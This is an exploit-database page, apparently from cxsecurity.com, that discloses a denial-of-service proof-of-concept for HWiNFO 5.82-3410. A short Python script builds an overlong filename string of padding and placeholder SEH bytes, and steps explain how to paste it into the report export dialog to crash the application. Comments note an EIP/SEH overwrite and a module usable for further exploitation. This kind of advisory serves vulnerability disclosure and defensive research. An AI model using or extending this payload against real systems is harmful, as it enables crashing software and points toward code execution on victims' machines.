HWiNFO 5.82-3410 Denial Of Service

2018.05.08
Credit: bzyo
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: HWiNFO 5.82-3410 - Denial of Service # Date: 05-04-18 # Vulnerable Software: HWiNFO 5.82-3410 # Vendor Homepage: https://www.hwinfo.com/ # Version: 5.82-3410 # Software Link: https://www.hwinfo.com/files/hwi_582.exe # Tested On: Windows 7 x86 # # PoC: # 1. generate hwinfo.txt, copy contents to clipboard # 2. open app, select Report, Create # 3. choose Export format XML # 4. paste hwinfo.txt contents into filename field # 5. select Next, Next # # app crashes & EIP overwrite; # !mona seh > only ppr, non-safeseh module contains startnull # 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE) # filename="hwinfo.txt" #offset 530 junk = "A"*526 seh = "B"*4 nseh = "C"*4 fill = "D"*9465 buffer = junk + seh + nseh + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top